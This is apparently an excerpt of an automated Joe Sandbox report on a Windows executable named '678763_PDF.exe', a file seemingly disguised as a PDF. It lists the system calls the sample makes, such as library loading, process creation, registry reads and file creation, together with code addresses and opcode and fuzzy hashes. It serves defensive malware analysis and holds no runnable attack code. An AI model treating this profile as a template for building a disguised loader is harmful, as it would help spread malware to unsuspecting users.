                                                                                                                                                                                    control_flow_graph 769 4020dd-4020e9 770 4021a8-4021aa 769->770 771 4020ef-402105 call 402dab * 2 769->771 772 4022f6-4022fb call 401423 770->772 780 402115-402124 LoadLibraryExW 771->780 781 402107-402113 GetModuleHandleW 771->781 779 402c2f-402c3e 772->779 783 402126-402135 call 4069ba 780->783 784 4021a1-4021a3 780->784 781->780 781->783 788 402170-402175 call 4055dc 783->788 789 402137-40213d 783->789 784->772 793 40217a-40217d 788->793 791 402156-40216e 789->791 792 40213f-40214b call 401423 789->792 791->793 792->793 802 40214d-402154 792->802 793->779 795 402183-40218d call 403bc9 793->795 795->779 801 402193-40219c FreeLibrary 795->801 801->779 802->793
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                                                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 334405425-0
                                                                                                                                                                                    • Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                                                                                                                    • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3356406503-0
                                                                                                                                                                                    • Opcode ID: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
                                                                                                                                                                                    • Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
                                                                                                                                                                                    • Opcode Fuzzy Hash: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                    • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                                                                                                                    • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                                                                                                                                                    • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004056BF
                                                                                                                                                                                      • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                                                    • CoUninitialize.COMBASE(00000404,00000000), ref: 0040570B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2896919175-0
                                                                                                                                                                                    • Opcode ID: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                                                                                                                                                    • Instruction ID: 02e921673ef7eca27cac182cfb7c492375eb89174892ab9280a6a273fd68093a
                                                                                                                                                                                    • Opcode Fuzzy Hash: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F0F0728006009BE7011794AE01B9773A4EBC5316F15543BFF89632A0CB3658018B5D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405AFB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                    • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                                                                                    • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$EnableShow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1136574915-0
                                                                                                                                                                                    • Opcode ID: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
                                                                                                                                                                                    • Instruction ID: 5ff066b55785a601c9e0ac29068a23864f952070569c454aea33db173c3c2586
                                                                                                                                                                                    • Opcode Fuzzy Hash: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 29E09A369082048FE705EBA4AE494AEB3B4EB80325B200A7FE001F11C0CBB84C00966C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, ohowno",?), ref: 00405B63
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?, ohowno",?), ref: 00405B70
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3712363035-0
                                                                                                                                                                                    • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                                                                                                                    • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                                                    • Opcode ID: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                                                                                                                                                    • Instruction ID: ac0fea7dd280022ba88880c6e2ee8458450bfb5d79ff8b32edbe1086f76aca9f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02E04F32B10114ABCB15DFA8FED08ADB3B6EB48320310143FD102B3690C775AD449B18
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                                                                      • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                                                                      • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                                                                                                                                      • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                                                                    • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                                                                    • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                                                                                                                                                                    • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 0040604B
                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                    • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                                                    • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
